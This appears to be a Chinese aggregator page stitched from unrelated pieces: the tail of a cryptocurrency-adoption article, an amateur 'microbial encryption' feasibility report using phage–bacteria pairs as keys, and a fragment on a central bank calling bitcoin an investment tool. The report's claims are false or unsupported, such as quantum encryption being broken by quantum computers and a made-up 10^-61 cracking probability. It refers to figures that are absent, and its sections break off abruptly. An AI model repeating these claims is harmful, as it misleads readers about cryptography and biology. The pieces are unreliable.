埃利斯認為，讓商人接納貨幣和讓采礦者接納相似，關鍵是了解他們不同的觀點。 「不同的利益相關者，卻有相同的規則。區別在於礦工有投機情緒，相比來說商人更保守。」他指出，商人有三個主要目的：賺錢，省錢，提高他們的意識。「如果能夠在降低支付費用的同時，為他們帶來客戶並提高銷售額，其餘的工作就是堅持不懈，讓他們盡可能輕松地開始工作。」
5、結論
論是從專業的角度，還是傳統的觀點，製造加密貨幣之旅的最後一步，就是用貨幣統治世界。但鑒於5000年以來沒有任何一種貨幣可以統治全球，不管矽谷比特幣愛好者說什麼 - 任何一種加密貨幣都是如此。
此外，加密貨幣統治全球「並不一定是目標，」埃利斯說。「貨幣可以是本地的，實際上我們認為羽毛幣是可以服務於全球市場的本地貨幣。」
其中可能蘊藏著新興加密貨幣領域的真正市場：某些社區，城市，活動，場地和人群的本地貨幣。圍繞著志同道合的消費者群體建立，使他們能夠快速自由地進行交易，並為他們生活中重要的商品和服務提供安全保障。而不必依靠中央銀行和大型市場來告訴他們，不管是硬幣還是紙幣，都具有價值。

㈣ 生物加密技術是怎麼回事

微生物加密技術可行性報告

一.概述：

隨著科技水平的日益提高，人們對信息安全也越來越重視，加密技術的研究已經越來越成熟。目前比較安全的加密技術是量子加密技術。但隨著計算機技術的發展，原來用普通計算機無法破解的量子加密技術現在也可以通過高速量子計算機進行解密。其他的一些加密技術就更不安全了。難道就沒有一種極其安全的加密技術了嗎？有，這里我要介紹一種新的加密技術——微生物加密技術。生物加密技術是一項新型的加密技術，它和傳統的物理加密，電子加密技術、量子加密技術在原理上有很大的不同。

二.實現原理及要點

1.它核心原理是利用噬菌體侵染細菌嚴格的一一對應性。首先我們要了解一下噬菌體（一種能感染細菌的病毒）侵染細菌的過程。

其侵染細菌的主要步驟包括:吸附、侵入、增值、成熟（裝配）、裂解（釋放）、等幾步。

侵染的具體過程為：

（1）噬菌體用尾部的末端吸附在細菌的表面；

（2）噬菌體通過尾軸把DNA全部注入到細菌的細胞中，噬菌體的蛋白質外殼則留在細胞的外面，不起作用；

（3）噬菌體的DNA在細菌體內，利用細菌的化學成分合成自身的DNA和蛋白質；

（4）新合成的DNA與蛋白質外殼，組裝出很多個與親代一模一樣的子代噬菌體；

（5）子代噬菌體由於細菌的解體而被釋放出來，再去侵染其他的細菌。

2.噬菌體是只能侵入特定的細菌的，其條件是非常嚴格的。我們需要在實驗室培養特定的噬菌體-細菌組合，它是經過特定的誘變處理的，當然這種組合是在自然條件下找不到的。我們培養出來的這種組合是隨機的，這樣可以提高安全性，他是經過特定的誘變處理的。因此只有這種組合組成一個解密模塊。加上噬菌體和細菌上DNA的鹼基數目龐大，所以其加密是非常安全的。

3.整個過程的實現：先簡單用文字描述一下。

1. 研製噬菌體加密模塊即噬菌體-細菌組合。（嚴格保密）

2. 製成模塊並封裝

3. 噬菌體侵染細菌，合成DNA。

4. DNA測序。解密條件：和噬菌體的DNA序列相同且有我們在細菌中加入的帶有特殊辨識功能的鹼基。

5. 條件符合。通過驗證。

6. 其流程圖如下

安全性說明：在嚴格保密的情況，第三方要破解，只能在實驗室培養出一個對應的噬菌體-細菌組合來。通過誘變的方法其破解幾率計算如下：

按照最大的誘變幾率10-1來計算。溫和性噬菌體的核心為線狀dsDNA，長度為48514bp，約含61個基因。那麼誘變出和加密噬菌體一樣的噬菌體的幾率為10-61。細菌的DNA上的鹼基至少有10000個，加密我們在其上面選取10個加密點，用放射性元素處理。加上DNA的結構本身也是未知的。兩者相乘，所以和它完全相同組合的概率基本為0。

其中計算機只用來分擔網路的運行，不進行加密信息的處理，因此不存在通過計算機黑客技術的破解。

三．模塊結構

模塊結構按照我的設計已經畫出了立體圖和透視圖，具體如下：

這是存放噬菌體的針，整體是空心的。裝入噬菌體後，尾部用塞子封裝。其中間為高壓。整體長82mm,後面粗的地方直徑6mm，孔直徑3mm：前端直徑2mm，孔直徑1mm。鈦合金製造。

這是上述針能插入的外套管。底部有空心球，存放解密的細菌。並且和DNA測序儀連通。為噬菌體侵染細菌的場所，其底部的球要求提供合適的溫度，陽離子濃度，輔助因子。其長度為100mm，外徑10mm，底部球的直徑為8mm。同樣為鈦合金製造。

這是將要插入的狀態。

這是完全插入的狀態，針的底部遇到負壓區，其中的噬菌體噴出。

四．加密模塊、高速計算機、測序儀的網路布局。

五．整套加密技術的特色：

1．不同密碼等級可以設定。不同的鹼基組合的安全級別是不同的。

2．遇到破解嘗試可以自毀。只要升高封裝裝置的溫度就可以殺死細菌，破壞裝置。裝置就無法打開。

3．裝置的解密組合可以更換，提高了安全性。隨著科研能力的提高只要選用不同的噬菌體－細菌組合，就可以了。

六.社會意義和經濟效益

社會意義：微生物加密技術能大大提高目前加密技術的安全性，從而使加密技術有一個質的飛躍。這可以為我國的國防，銀行等部門提供前所未有的安全保障。更重要的是提高了生物技術在科技領域的作用，提高人們對生物技術的信心。為生物革命奠定基礎。

經濟效益：評價任何一項新技術的一個標準是這項技術是否有巨大的經濟效益。我們可想而知，加密技術運用廣泛，我們的日常生活離不開加密技術，試想一下要是在那麼多的鎖上用上次項技術，那

么其經濟效益是巨大的。另外一些需要嚴格加密的部門如：銀行、證券、安全部門就需要更加有效的加密技術。

每套裝置的成本計算如下

1. 高速伺服器 10萬

2. DNA測序儀 15萬

3. 網路費用 2萬

4. 噬菌體模塊封裝外殼製造費用。 2萬/年

5. 不同噬菌體-細菌組合的開發成本。 10萬/年

6. 為各個單位保存，保密噬菌體的費用。 10萬/年

初期實驗室和設備投資10000萬，每年為保證新產品的開發實驗室和設備的更新花費1000萬。

初期研發費用1000萬。每年的研發費用增加10%

售價每套系統500萬人民幣，每年的許可證價格80萬人民幣。

系統預期壽命為10年。

預計第一年的銷售量為50套，每年銷售額增加10%。

第一年投資（10+15+2+2+10+10）*50+1000+10000=13450萬

第一年銷售額 500*50=25000萬

第一年獲利11550萬

所以第一年投資就可收回。

第二年投資49*50*（1+10%）+1000（1+10%）+1000+50*22=5895萬

第二年銷售額 50*80+55*500=33500萬

第二年獲利27610萬

且第三年以後獲利將保持增加。

七．行業標准：

目前還沒有生物加密的行業標准和國家標准。但是通過上面的安全性計算其安全性是非常好的。作為一項加密技術其安全性是應該放在首位的。我們奉行的是有價值的客戶是上帝，其售後服務，和個性化改造都是一流的。

八．今後的規劃：

1.噬菌體選擇：運用轉基因技術培養新菌種，增加獲取噬菌體種類和遺傳信息的難度。提高噬菌體加密的安全性。

2.減少菌體侵染時間：目前噬菌體的侵染時間：15秒，長的侵染周期降低了此技術的使用范圍研究新的酶，提高侵染速度。

3.正確性驗證的抗干擾能力的提高：這也是目前破解的主要手段。生物手段和高新技術的結合永遠是噬菌體加密技術的研究方向。

4.封裝技術的改進：因為是生物加密。生命物質有比較苛刻的生存條件。改進封裝技術能提高此技術的使用范圍。抗高溫，抗輻射是主要的研究方向。

㈤ 央行談加密資產監管，強調「投資工具」身份，，加密貨幣未來將會何去何從

央行在這一次的發布會當中就談到了關於加密資產的監管問題，我們都知道現在最流行或者說話題性最高的加密資產應該就是比特幣。而在這一次的央行發布會當中，有重點地點明了比特幣也是一個重要的投資工具，而不是一個資產工具。那麼今天我們就來探討一下，加密貨幣未來將會何去何從。

第三，如何看待以後加密貨幣的存在？

當各個國家的數字貨幣全部流行起來的話，也就意味著像比特幣這樣的加密貨幣就沒有生存的空間，畢竟在那個時候，比特幣本身的稀缺性就已經被打破。而實際上，從嚴格意義上來說，比特幣本身就沒有稀缺性，其自身的價值也是不斷炒作而來的。所以在我看來，正如同央行所說的那樣，比特幣只不過是一個投資工具，其本身並不具備貨幣的價值。